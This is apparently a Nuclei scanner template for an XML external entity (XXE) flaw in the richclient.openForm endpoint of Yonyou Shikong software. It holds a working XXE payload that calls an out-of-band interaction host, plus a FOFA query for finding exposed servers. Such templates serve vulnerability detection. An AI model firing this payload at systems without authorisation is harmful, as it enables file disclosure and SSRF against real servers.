http:
    - matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      raw:
        - |
          POST /formservice?service=richclient.openForm HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/Xml

          <?xml version="1.0" encoding="UTF-8"?>
          <!DOCTYPE root [<!ENTITY % remote SYSTEM "http://{{interactsh-url}}"> %remote;]>
          <root/>
id: yongyoushikong-richclient_openForm-XXE
info:
    author: Superhero
    description: |-
        fofa: body="时空智友"
        用友时空 richclient.openForm 接口处存在XML实体注入漏洞，攻击者可利用xxe漏洞获取服务器敏感数据，可读取任意文件以及ssrf攻击，存在一定的安全隐患。
    name: 用友时空 richclient.openForm XXE漏洞
    reference:
        - https://mp.weixin.qq.com/s/xwiSH9SFnyWLNaxaoxnkWw
    severity: high
    tags:
        - XXE
        - Kong
